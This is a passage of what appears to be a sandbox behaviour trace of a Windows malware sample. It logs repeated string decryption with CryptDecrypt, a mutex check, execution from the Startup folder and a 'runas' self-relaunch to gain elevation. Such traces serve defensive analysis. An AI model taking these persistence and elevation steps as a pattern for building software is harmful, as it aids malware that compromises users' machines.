CryptDestroyKey (hKey=0x1327618) returned 1 [0151.125] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb04a0 | out: hHeap=0x2cb0000) returned 1 [0151.125] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2cbbf68, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0151.125] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf90 | out: hHeap=0x2cb0000) returned 1 [0151.125] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e8 | out: hHeap=0x2cb0000) returned 1 [0151.126] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2c8f80c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2c8f80c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0151.126] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf68 | out: hHeap=0x2cb0000) returned 1 [0151.126] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x40) returned 0x2cbbf68 [0151.126] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f798, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f800 | out: phKey=0x2c8f800*=0x13272d8) returned 1 [0151.126] CryptSetKeyParam (hKey=0x13272d8, dwParam=0x1, pbData=0x2c8f7e8, dwFlags=0x0) returned 1 [0151.126] CryptDecrypt (in: hKey=0x13272d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cbbf68, pdwDataLen=0x2c8f7b4 | out: pbData=0x2cbbf68, pdwDataLen=0x2c8f7b4) returned 1 [0151.126] CryptDestroyKey (hKey=0x13272d8) returned 1 [0151.126] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x34) returned 0x2cb13e8 [0151.126] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x4dc [0151.126] WaitForSingleObject (hHandle=0x4dc, dwMilliseconds=0x0) returned 0x102 [0151.126] CloseHandle (hObject=0x4dc) returned 1 [0151.126] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf68 | out: hHeap=0x2cb0000) returned 1 [0151.126] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e8 | out: hHeap=0x2cb0000) returned 1 [0151.126] Sleep (dwMilliseconds=0x3e8) [0152.249] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20) returned 0x2cb13e8 [0152.263] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f764, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7cc | out: phKey=0x2c8f7cc*=0x13273d8) returned 1 [0152.264] CryptSetKeyParam (hKey=0x13273d8, dwParam=0x1, pbData=0x2c8f7b4, dwFlags=0x0) returned 1 [0152.264] CryptDecrypt (in: hKey=0x13273d8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb13e8, pdwDataLen=0x2c8f780 | out: pbData=0x2cb13e8, pdwDataLen=0x2c8f780) returned 1 [0152.264] CryptDestroyKey (hKey=0x13273d8) returned 1 [0152.264] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1e) returned 0x2cbbf68 [0152.264] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1e) returned 0x2cbbf90 [0152.264] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb04a0 [0152.264] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f73c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7a4 | out: phKey=0x2c8f7a4*=0x1327598) returned 1 [0152.264] CryptSetKeyParam (hKey=0x1327598, dwParam=0x1, pbData=0x2c8f78c, dwFlags=0x0) returned 1 [0152.264] CryptDecrypt (in: hKey=0x1327598, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb04a0, pdwDataLen=0x2c8f758 | out: pbData=0x2cb04a0, pdwDataLen=0x2c8f758) returned 1 [0152.264] CryptDestroyKey (hKey=0x1327598) returned 1 [0152.264] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb04a0 | out: hHeap=0x2cb0000) returned 1 [0152.264] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2cbbf68, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0152.264] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf90 | out: hHeap=0x2cb0000) returned 1 [0152.264] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e8 | out: hHeap=0x2cb0000) returned 1 [0152.264] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2c8f80c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2c8f80c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0152.264] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf68 | out: hHeap=0x2cb0000) returned 1 [0152.264] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x40) returned 0x2cbbf68 [0152.264] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f798, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f800 | out: phKey=0x2c8f800*=0x1326f58) returned 1 [0152.264] CryptSetKeyParam (hKey=0x1326f58, dwParam=0x1, pbData=0x2c8f7e8, dwFlags=0x0) returned 1 [0152.264] CryptDecrypt (in: hKey=0x1326f58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cbbf68, pdwDataLen=0x2c8f7b4 | out: pbData=0x2cbbf68, pdwDataLen=0x2c8f7b4) returned 1 [0152.265] CryptDestroyKey (hKey=0x1326f58) returned 1 [0152.265] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x34) returned 0x2cb13e8 [0152.265] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x4dc [0152.265] WaitForSingleObject (hHandle=0x4dc, dwMilliseconds=0x0) returned 0x102 [0152.265] CloseHandle (hObject=0x4dc) returned 1 [0152.265] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf68 | out: hHeap=0x2cb0000) returned 1 [0152.265] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e8 | out: hHeap=0x2cb0000) returned 1 [0152.265] Sleep (dwMilliseconds=0x3e8) [0153.408] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20) returned 0x2cb13e8 [0153.408] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f764, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7cc | out: phKey=0x2c8f7cc*=0x1327498) returned 1 [0153.408] CryptSetKeyParam (hKey=0x1327498, dwParam=0x1, pbData=0x2c8f7b4, dwFlags=0x0) returned 1 [0153.408] CryptDecrypt (in: hKey=0x1327498, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb13e8, pdwDataLen=0x2c8f780 | out: pbData=0x2cb13e8, pdwDataLen=0x2c8f780) returned 1 [0153.408] CryptDestroyKey (hKey=0x1327498) returned 1 [0153.408] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x1e) returned 0x2cbbf68 [0153.408] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x1e) returned 0x2cbbf90 [0153.408] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x90) returned 0x2cb04a0 [0153.408] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f73c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f7a4 | out: phKey=0x2c8f7a4*=0x1327598) returned 1 [0153.408] CryptSetKeyParam (hKey=0x1327598, dwParam=0x1, pbData=0x2c8f78c, dwFlags=0x0) returned 1 [0153.408] CryptDecrypt (in: hKey=0x1327598, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb04a0, pdwDataLen=0x2c8f758 | out: pbData=0x2cb04a0, pdwDataLen=0x2c8f758) returned 1 [0153.408] CryptDestroyKey (hKey=0x1327598) returned 1 [0153.408] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb04a0 | out: hHeap=0x2cb0000) returned 1 [0153.408] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2cbbf68, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0153.408] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf90 | out: hHeap=0x2cb0000) returned 1 [0153.408] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e8 | out: hHeap=0x2cb0000) returned 1 [0153.408] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x2c8f80c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x2c8f80c*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0153.409] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf68 | out: hHeap=0x2cb0000) returned 1 [0153.409] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x40) returned 0x2cbbf68 [0153.409] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2c8f798, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c8f800 | out: phKey=0x2c8f800*=0x1326f58) returned 1 [0153.409] CryptSetKeyParam (hKey=0x1326f58, dwParam=0x1, pbData=0x2c8f7e8, dwFlags=0x0) returned 1 [0153.409] CryptDecrypt (in: hKey=0x1326f58, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cbbf68, pdwDataLen=0x2c8f7b4 | out: pbData=0x2cbbf68, pdwDataLen=0x2c8f7b4) returned 1 [0153.409] CryptDestroyKey (hKey=0x1326f58) returned 1 [0153.409] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x34) returned 0x2cb13e8 [0153.409] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\0115B419773001") returned 0x4dc [0153.409] WaitForSingleObject (hHandle=0x4dc, dwMilliseconds=0x0) returned 0x102 [0153.409] CloseHandle (hObject=0x4dc) returned 1 [0153.410] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cbbf68 | out: hHeap=0x2cb0000) returned 1 [0153.410] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb13e8 | out: hHeap=0x2cb0000) returned 1 [0153.410] Sleep (dwMilliseconds=0x3e8) Thread: id = 50 os_tid = 0xdf8 [0129.416] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x10) returned 0x2cb1240 [0129.416] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2e2f974, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e2f9dc | out: phKey=0x2e2f9dc*=0x13097f0) returned 1 [0129.416] CryptSetKeyParam (hKey=0x13097f0, dwParam=0x1, pbData=0x2e2f9c4, dwFlags=0x0) returned 1 [0129.416] CryptDecrypt (in: hKey=0x13097f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb1240, pdwDataLen=0x2e2f990 | out: pbData=0x2cb1240, pdwDataLen=0x2e2f990) returned 1 [0129.416] CryptDestroyKey (hKey=0x13097f0) returned 1 [0129.417] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x20a) returned 0x2cb1258 [0129.417] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x50) returned 0x2cb1470 [0129.417] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2e2f950, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e2f9b8 | out: phKey=0x2e2f9b8*=0x13096f0) returned 1 [0129.417] CryptSetKeyParam (hKey=0x13096f0, dwParam=0x1, pbData=0x2e2f9a0, dwFlags=0x0) returned 1 [0129.417] CryptDecrypt (in: hKey=0x13096f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb1470, pdwDataLen=0x2e2f96c | out: pbData=0x2cb1470, pdwDataLen=0x2e2f96c) returned 1 [0129.417] CryptDestroyKey (hKey=0x13096f0) returned 1 [0129.417] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74440000 [0129.417] GetProcAddress (hModule=0x74440000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x74456b30 [0129.417] Wow64DisableWow64FsRedirection (in: OldValue=0x2e2fa00 | out: OldValue=0x2e2fa00*=0x0) returned 1 [0129.417] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1470 | out: hHeap=0x2cb0000) returned 1 [0129.417] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2cb1258, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\1.exe")) returned 0x53 [0129.417] ShellExecuteExW (in: pExecInfo=0x2e2f9a8*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.exe", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2e2f9a8*(cbSize=0x3c, fMask=0x0, hwnd=0x0, lpVerb="runas", lpFile="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\1.exe", lpParameters=0x0, lpDirectory=0x0, nShow=1, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0)) returned 1 [0134.195] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x50) returned 0x2cb1470 [0134.195] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2e2f95c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e2f9c4 | out: phKey=0x2e2f9c4*=0x1327658) returned 1 [0134.195] CryptSetKeyParam (hKey=0x1327658, dwParam=0x1, pbData=0x2e2f9ac, dwFlags=0x0) returned 1 [0134.195] CryptDecrypt (in: hKey=0x1327658, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb1470, pdwDataLen=0x2e2f978 | out: pbData=0x2cb1470, pdwDataLen=0x2e2f978) returned 1 [0134.195] CryptDestroyKey (hKey=0x1327658) returned 1 [0134.195] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74440000 [0134.196] GetProcAddress (hModule=0x74440000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x74456b50 [0134.196] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0134.196] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1470 | out: hHeap=0x2cb0000) returned 1 [0134.196] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1258 | out: hHeap=0x2cb0000) returned 1 [0134.196] HeapFree (in: hHeap=0x2cb0000, dwFlags=0x0, lpMem=0x2cb1240 | out: hHeap=0x2cb0000) returned 1 Thread: id = 51 os_tid = 0xdfc Thread: id = 52 os_tid = 0xe00 Thread: id = 53 os_tid = 0xe04 Thread: id = 54 os_tid = 0xe08 Thread: id = 55 os_tid = 0xe0c Thread: id = 56 os_tid = 0xe10 Thread: id = 57 os_tid = 0xe14 Thread: id = 73 os_tid = 0xf0c [0134.391] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x440) returned 0x2cb5370 [0134.391] CryptImportKey (in: hProv=0x12f68a8, pbData=0x2e2fd2c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e2fd94 | out: phKey=0x2e2fd94*=0x1327198) returned 1 [0134.391] CryptSetKeyParam (hKey=0x1327198, dwParam=0x1, pbData=0x2e2fd7c, dwFlags=0x0) returned 1 [0134.391] CryptDecrypt (in: hKey=0x1327198, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2cb5370, pdwDataLen=0x2e2fd48 | out: pbData=0x2cb5370, pdwDataLen=0x2e2fd48) returned 1 [0134.391] CryptDestroyKey (hKey=0x1327198) returned 1 [0134.391] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x0, Size=0x434) returned 0x2cb57b8 [0134.391] GetLastError () returned 0x0 [0134.391] RtlAllocateHeap (HeapHandle=0x2cb0000, Flags=0x8, Size=0x214) returned 0x2cb4660 [0134.391] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74440000 [0134.391] GetCurrentThreadId () returned 0xf0c [0134.391] SetLastError (dwErrCode=0x0) [0134.392] GetLastError () returned 0x0 [0134.392] SetLastError (dwErrCode=0x0) [0134.392] GetLastError () returned 0x0 [0134.392] SetLastError (dwErrCode=0x0) [0134.392] GetLastError () returned 0x0 [0134.392] SetLastError (dwErrCode=0x0) [0134.392] GetLastError () returned 0x0 [0134.392] SetLastError (dwErrCode=0x0) [0134.392] GetLastError () returned 0x0 [0134.392] SetLastError (dwErrCode=0x0) [0134.392] GetLastError () returned 0x0 [0134.392] SetLastError (dwErrCode=0x0) [0134.392] GetLastError () returned 0x0 [0134.392] SetLastError (dwErrCode=0x0) [0134.392] GetLastError () returned 0x0 [0134.392] SetLastError (dwErrCode=0x0) [0134.392] GetLastError () returned 0x0 [0134.392] SetLastError (dwErrCode=0x0) [0134.392] GetLastError () returned 0x0 [0134.392] SetLastError (dwErrCode=0x0) [0134.392] GetLastError () returned 0x0 [0134.392] SetLastError (dwErrCode=0x0) [0134.392] GetLastError () returned 0x0 [0134.393] SetLastError (dwErrCode=0x0) [0134.393] GetLastError () returned 0x0 [0134.393] SetLastError (dwErrCode=0x0) [0134.393] GetLastError () returned 0x0 [0134.393] SetLastError (dwErrCode=0x0) [0134.393] GetLastError () returned 0x0 [0134.393] SetLastError (dwErrCode=0x0) [0134.393] GetLastError () returned 0x0 [0134.393] SetLastError (dwErrCode=0x0) [0134.393] GetLastError () returned 0x0 [0134.393] SetLastError (dwErrCode=0x0) [0134.393] GetLastError () returned 0x0 [0134.393] SetLastError (dwErrCode=0x0) [0134.393] GetLastError () returned 0x0 [0134.393] SetLastError (dwErrCode=0x0) [0134.393] GetLastError () returned 0x0 [0134.393] SetLastError (dwErrCode=0x0) [0134.393] GetLastError () returned 0x0 [0134.393] SetLastError (dwErrCode=0x0) [0134.393] GetLastError () returned 0x0 [0134.393] SetLastError (dwErrCode=0x0) [0134.393] GetLastError () returned 0x0 [0134.393] SetLastError (dwErrCode=0x0) [0134.393] GetLastError () returned 0x0 [0134.394] SetLastError (dwErrCode=0x0) [0134.394] GetLastError () returned 0x0 [0134.394] SetLastError (dwErrCode=0x0) [0134.394] GetLastError () returned 0x0 [0134.394] SetLastError (dwErrCode=0x0) [0134.394] GetLastError () returned 0x0 [0134.394] SetLastError (dwErrCode=0x0) [0134.394] GetLastError () returned 0x0 [0134.394] SetLastError (dwErrCode=0x0) [0134.394] GetLastError () returned 0x0 [0134.394] SetLastError (dwErrCode=0x0) [0134.394] GetLastError () returned 0x0 [0134.394] SetLastError (dwErrCode=0x0) [0134.394] GetLastError () returned 0x0 [0134.394] SetLastError (dwErrCode=0x0) [0134.394] GetLastError () returned 0x0 [0134.394] SetLastError (dwErrCode=0x0) [0134.394] GetLastError () returned 0x0 [0134.394] SetLastError (dwErrCode=0x0) [0134.394] GetLastError () returned 0x0 [0134.394] SetLastError (dwErrCode=0x0) [0134.394] GetLastError () returned 0x0 [0134.394] SetLastError (dwErrCode=0x0) [0134.394] GetLastError () returned 0x0 [0134.394] SetLastError (dwErrCode=0x0) [0134.395] GetLastError () returned 0x0 [0134.395] SetLastError (dwErrCode=0x0) [0134.395] GetLastError () returned 0x0 [0134.395] SetLastError (dwErrCode=0x0) [0134.395] GetLastError () returned 0x0 [0134.395] SetLastError (dwErrCode=0x0) [0134.395] GetLastError () returned 0x0 [0134.395] SetLastError (dwErrCode=0x0) [0134.395] GetLastError () returned 0x0 [0134.395] SetLastError (dwErrCode=0x0) [0134.395] GetLastError () returned 0x0 [0134.395] SetLastError (dwErrCode=0x0) [0134.395] GetLastError () returned 0x0 [0134.395] SetLastError (dwErrCode=0x0) [0134.395] GetLastError () returned 0x0 [0134.395] SetLastError (dwErrCode=0x0) [0134.395] GetLastError () returned 0x0 [0134.395] SetLastError (dwErrCode=0x0) [0134.395] GetLastError () returned 0x0 [0134.395] SetLastError (dwErrCode=0x0) [0134.395] GetLastError () returned 0x0 [0134.395] SetLastError (dwErrCode=0x0) [0134.395] GetLastError () returned 0x0 [0134.395] SetLastError (dwErrCode=0x0) [0134.396] GetLastError () returned 0x0 [0134.396] SetLastError (dwErrCode=0x0) [0134.396] GetLastError () returned 0x0 [0134.396] SetLastError (dwErrCode=0x0) [0134.396] GetLastError () returned 0x0 [0134.396] SetLastError (dwErrCode=0x0) [0134.396] GetLastError () returned 0x0 [0134.396] SetLastError (dwErrCode=0x0) [0134.396] GetLastError () returned 0x0 [0134.396] SetLastError (dwErrCode=0x0) [0134.396] GetLastError () returned 0x0 [0134.396] SetLastError (dwErrCode=0x0) [0134.396] GetLastError () returned 0x0 [0134.396] SetLastError (dwErrCode=0x0) [0134.396] GetLastError () returned 0x0 [0134.396] SetLastError (dwErrCode=0x0) [0134.396] GetLastError () returned 0x0 [0134.396] SetLastError (dwErrCode=0x0) [0134.396] GetLastError () returned 0x0 [0134.396] SetLastError (dwErrCode=0x0) [0134.396] GetLastError () returned 0x0 [0134.396] SetLastError (dwErrCode=0x0) [0134.396] GetLastError () returned 0x0 [0134.396] SetLastError (dwErrCode=0x0) [0134.397] GetLastError () returned 0x0 [0134.397] SetLastError (dwErrCode=0x0) [0134.397] GetLastError () returned 0x0 [0134.397] SetLastError (dwErrCode=0x0) [0134.397] GetLastError () returned 0x0 [0134.397] SetLastError (dwErrCode=0x0) [0134.397] GetLastError () returned 0x0 [0134.397] SetLastError (dwErrCode=0x0) [0134.397] GetLastError () returned 0x0 [0134.397] SetLastError (dwErrCode=0x0) [0134.397] GetLastError () returned 0x0 [0134.397] SetLastError (dwErrCode=0x0) [0134.397] GetLastError () returned 0x0 [0134.397] SetLastError (dwErrCode=0x0) [0134.397] GetLastError () returned 0x0 [0134.397] SetLastError (dwErrCode=0x0) [0134.397] GetLastError () returned 0x0 [0134.397] SetLastError (dwErrCode=0x0) [0134.397] GetLastError () returned 0x0 [0134.397] SetLastError (dwErrCode=0x0) [0134.397] GetLastError () returned 0x0 [0134.397] SetLastError (dwErrCode=0x0) [0134.397] GetLastError () returned 0x0 [0134.398] SetLastError (dwErrCode=0x0) [0134.398] GetLastError () returned 0x0 [0134.398] SetLastError (dwErrCode=0x0) [0134.398] GetLastError () returned 0x0 [0134.398] SetLastError (dwErrCode=0x0) [0134.398] GetLastError () returned 0x0 [0134.398] SetLastError (dwErrCode=0x0) [0134.398] GetLastError () returned 0x0 [0134.398] SetLastError (dwErrCode=0x0) [0134.398] GetLastError () returned 0x0 [0134.398] SetLastError (dwErrCode=0x0) [0134.398] GetLastError () returned 0x0 [0134.398] SetLastError (dwErrCode=0x0) [0134.398] GetLastError () returned 0x0 [0134.398] SetLastError (dwErrCode=0x0) [0134.398] GetLastError () returned 0x0 [0134.398] SetLastError (dwErrCode=0x0) [0134.398] GetLastError () returned 0x0 [0134.398] SetLastError (dwErrCode=0x0) [0134.398] GetLastError () returned 0x0 [0134.398] SetLastError (dwErrCode=0x0) [0134.398] GetLastError () returned 0x0 [0134.398] SetLastError (dwErrCode=0x0) [0134.398] GetLastError () returned 0x0 [0134.398] SetLastError (dwErrCode=0x0) [0134.398] GetLastError () returned 0x0 [0134.399] SetLastError (dwErrCode=0x0) [0134.399] GetLastError () returned 0x0 [0134.399] SetLastError (dwErrCode=0x0) [0134.399] GetLastError () returned 0x0 [0134.399] SetLastError (dwErrCode=0x0) [0134.399] GetLastError () returned 0x0 [0134.399] SetLastError (dwErrCode=0x0) [0134.399] GetLastError () returned 0x0 [0134.399] SetLastError (dwErrCode=0x0) [0134.399] GetLastError () returned 0x0 [0134.399] SetLastError (dwErrCode=0x0) [0134.399] GetLastError () returned 0x0 [0134.399] SetLastError (dwErrCode=0x0) [0134.399] GetLastError () returned 0x0 [0134.399] SetLastError (dwErrCode=0x0) [0134.399] GetLastError () returned 0x0 [0134.399] SetLastError (dwErrCode=0x0) [0134.399] GetLastError () returned 0x0 [0134.399] SetLastError (dwErrCode=0x0) [0134.399] GetLastError () returned 0x0 [0134.399] SetLastError (dwErrCode=0x0) [0134.399] GetLastError () returned 0x0 [0134.399] SetLastError (dwErrCode=0x0) [0134.399] GetLastError () returned 0x0 [0134.399] SetLastError (dwErrCode=0x0) [0134.400] GetLastError () returned 0x0 [0134.400] SetLastError (dwErrCode=0x0) [0134.400] GetLastError () returned 0x0 [0134.400] SetLastError (dwErrCode=0x0) [0134.400] GetLastError () returned 0x0 [0134.400] SetLastError (dwErrCode=0x0) [0134.400] GetLastError () returned 0x0 [0134.400] SetLastError (dwErrCode=0x0) [0134.400] GetLastError () returned 0x0 [0134.400] SetLastError (dwErrCode=0x0) [0134.400] GetLastError () returned 0x0 [0134.400] SetLastError (dwErrCode=0x0) [0134.400] GetLastError () returned 0x0 [0134.400] SetLastError (dwErrCode=0x0) [0134.400] GetLastError () returned 0x0 [0134.400] SetLastError (dwErrCode=0x0) [0134.400] GetLastError () returned 0x0 [0134.400] SetLastError (dwErrCode=0x0) [0134.400] GetLastError () returned 0x0 [0134.400] SetLastError (dwErrCode=0x0) [0134.400] GetLastError () returned 0x0 [0134.400] SetLastError (dwErrCode=0x0) [0134.400] GetLastError () returned 0x0 [0134.400] SetLastError (dwErrCode=0x0) [0134.401] GetLastError () returned 0x0 [0134.401] SetLastError (dwErrCode=0x0) [0134.401] GetLastError () returned 0x0 [0134.401] SetLastError (dwErrCode=0x0) [0134.401] GetLastError () returned 0x0 [0134.401] SetLastError (dwErrCode=0x0) [0134.401] GetLastError () returned 0x0 [0134.401] SetLastError (dwErrCode=0x0) [0134.401] GetLastError () returned 0x0 [0134.401] SetLastError (dwErrCode=0x0) [0134.401] GetLastError () returned 0x0 [0134.401] SetLastError (dwErrCode=0x0) [0134.401] GetLastError () returned 0x0 [0134.401] SetLastError (dwErrCode=0x0) [0134.401] GetLastError () returned 0x0 [0134.401] SetLastError (dwErrCode=0x0) [0134.401] GetLastError () returned 0x0 [0134.401] SetLastError (dwErrCode=0x0) [0134.401] GetLastError () returned 0x0 [0134.401] SetLastError (dwErrCode=0x0) [0134.401] GetLastError () returned 0x0 [0134.401] SetLastError (dwErrCode=0x0) [0134.401] GetLastError () returned 0x0 [0134.401] SetLastError (dwErrCode=0x0) [0134.401] GetLastError () returned 0x0 [0134.402] SetLastError (dwErrCode=0x0) [0134.402] GetLastError () returned 0x0 [0134.402] SetLastError (dwErrCode=0x0) [0134.402] GetLastError () returned 0x0 [0134.402] SetLastError (dwErrCode=0x0) [0134.402] GetLastError () returned 0x0 [0134.402] SetLastError (dwErrCode=0x0) [0134.402] GetLastError () returned 0x0 [0134.402] SetLastError (dwErrCode=0x0) [0134.402] GetLastError () returned 0x0 [0134.402] SetLastError (dwErrCode=0x0) [0134.402] GetLastError () returned 0x0 [0134.402] SetLastError (dwErrCode=0x0) [0134.402] GetLastError () returned 0x0 [0134.402] SetLastError (dwErrCode=0x0) [0134.402] GetLastError () returned 0x0 [0134.402] SetLastError (dwErrCode=0x0) [0134.402] GetLastError () returned 0x0 [0134.402] SetLastError (dwErrCode=0x0) [0134.402] GetLastError () returned 0x0 [0134.402] SetLastError (dwErrCode=0x0) [0134.402] GetLastError () returned 0x0 [0134.402] SetLastError (dwErrCode=0x0) [0134.402] GetLastError () returned 0x0 [0134.402] SetLastError (dwErrCode=0x0) [0134.403] GetLastError () returned 0x0 [0134.403] SetLastError (dwErrCode=0x0) [0134.403] GetLastError () returned 0x0 [0134.403] SetLastError (dwErrCode=0x0) [0134.403] GetLastError () returned 0x0 [0134.403] SetLastError (dwErrCode=0x0) [0134.403] GetLastError () returned 0x0 [0134.403] SetLastError (dwErrCode=0x0) 